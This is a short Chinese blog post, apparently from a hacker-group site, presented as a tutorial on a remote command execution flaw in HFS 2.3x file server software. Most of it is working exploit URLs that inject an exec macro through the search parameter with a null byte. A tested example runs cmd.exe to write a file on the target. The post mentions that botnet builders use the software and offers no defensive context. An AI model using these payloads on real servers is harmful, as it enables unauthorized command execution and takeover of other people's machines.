国外软件HFS 2.3x 远程命令执行漏洞（本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件）本站教程教习如何梨园远程命令执行。。中国寒龙

这个程序在国内用的特别多，特别是那些抓肉鸡的黑阔。

1 2	http://localhost:80/?search==%00{.exec\|cmd.} http://localhost:80/search=%00{.exec\|cmd.}

注：有些版本search前面是没有?的。

测试部分：
百度搜HFS默认就是2.3x版本，执行echo测试成功：

1	http://localhost:8080/?search==%00{.exec\|cmd.exe%20/c%20echo>c:/1.txt%20123.}

posted @ 2015-09-07 14:17 中国寒龙联盟核心管理阅读(1691) 评论(0) 编辑收藏举报

刷新页面返回顶部

国外软件HFS 2.3x 远程命令执行漏洞 （本程序某些YY黑阔大牛抓鸡抓IP工具中使用到本软件）本站教程教习如何梨园远程命令执行。。中国寒龙